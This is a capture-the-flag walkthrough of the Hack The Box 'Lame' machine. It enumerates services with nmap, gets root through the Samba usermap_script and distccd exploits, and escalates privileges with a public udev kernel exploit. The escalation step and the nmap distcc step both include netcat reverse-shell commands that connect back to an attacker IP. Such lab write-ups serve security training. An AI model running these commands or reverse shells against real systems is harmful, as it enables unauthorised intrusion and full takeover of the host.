This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Lets start cracking!!!

Enumeration

Nmap Scanning Results

Command: nmap -sV -A 10.10.10.3
- No UDP Ports
- TCP Port Scan

PORT     STATE         SERVICE     VERSION
21/tcp      open ftp      vsftpd 2.3.4
ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp     open ssh      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp      open netbios-ssn     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp      open netbios-ssn     Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp      open distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
|_ Workgroup: WORKGROUP\x00

Exploit Searching

So theres is distccd 4.2.4, samba 3.0.20 service are running on the remote machine. After a quick search on Metasploit and Google found that both the services were vulnerble with public exploit available.

URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Exploitation (with Metasploit)

Samba

Metasploit Samba Command Execuation module is the first exploit I chose to go with. I know there is auxillary script to confirm this vulnerability but who wants to run that on test machine. One must try those to check the results of those scripts. Start Metasploit and run the exploit.
Yaay!! We got the access as root user!!

distccd

I was curious about this service from the start and wanted to dig more. distccd module is also available in metasploit so lets exploit. It worked but we got a limited shell meaning we are in as a daemon service not as root user/ standard user. Lets find a way to Privilege Escalate it.

Privilege Escalation

Run COMMAND: uname -a to find out the linux kernel and os version running on the machine. Remote server kernel running foudn to be vulnerable - linux 2.6.24-16-server Now Download the Exploit to the local machine :

COMMAND: wget http://www.exploit-db.com/download/8572

Move to "/var/www/html" and change permission. Open Apache web server on your local atacking machine

COMMAND: service apache2 start

Download exploit in remote machine /tmp folder and compile 8572.c

COMMAND: gcc 8572.c -o exploit

Now we need Create file "run" in tmp file as the exploit executes "run" file.

COMMANDS: echo '#!/bin/bash' > run echo '/bin/netcat -e /bin/bash 10.10.10.15 1234' >> run
Execute below to find pid of udevd

COMMAND: cat /proc/net/netlink

Start listener on local machine

And execute exploit with pid of udevd.

Got r00t!!!!

Exploitation (Without Metasploit)

Distcc service can also be exploited without the use of metasploit by using nmap script. To test first we run COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'" We got the uid and gid info back meaning this script is working. now we can go ahead and get root shell. COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102 1234'" Now grab the flags.This was an easy and privilege escalation part was the interesting bit here.